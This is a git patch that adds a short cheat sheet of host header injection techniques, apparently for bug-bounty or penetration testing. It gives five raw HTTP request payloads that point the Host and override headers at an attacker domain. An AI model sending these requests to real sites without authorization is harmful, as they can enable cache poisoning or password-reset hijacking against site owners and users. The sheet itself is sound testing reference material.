From 6eb123fe0fa1b830724260e59f1958e53155ba64 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Fri, 6 Nov 2020 13:14:50 +0700
Subject: [PATCH] Host Header Injection [1]

Create account host header injection tips and add 5 tips
---
 HostHeaderInjection.md | 45 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 HostHeaderInjection.md

diff --git a/HostHeaderInjection.md b/HostHeaderInjection.md
new file mode 100644
index 0000000..50c8d83
--- /dev/null
+++ b/HostHeaderInjection.md
@@ -0,0 +1,45 @@
+# Host Header Injection
+
+1. Change the host header
+```
+GET /index.php HTTP/1.1
+Host: evil-website.com
+...
+```
+2. Duplicating the host header
+```
+GET /index.php HTTP/1.1
+Host: vulnerable-website.com
+Host: evil-website.com
+...
+```
+3. Add line wrapping
+```
+GET /index.php HTTP/1.1
+ Host: vulnerable-website.com
+Host: evil-website.com
+...
+```
+4. Add host override headers
+```
+X-Forwarded-For : evil-website.com
+X-Forwarded-Host : evil-website.com
+X-Client-IP : evil-website.com
+X-Remote-IP : evil-website.com
+X-Remote-Addr : evil-website.com
+X-Host : evil-website.com
+```
+How to use? In this case im using "X-Forwarded-For : evil.com"
+```
+GET /index.php HTTP/1.1
+Host: vulnerable-website.com
+X-Forwarded-For : evil-website.com
+...
+```
+5. Supply an absolute URL
+```
+GET https://vulnerable-website.com/ HTTP/1.1
+Host: evil-website.com
+...
+```
+Source: https://portswigger.net/web-security/host-header/exploiting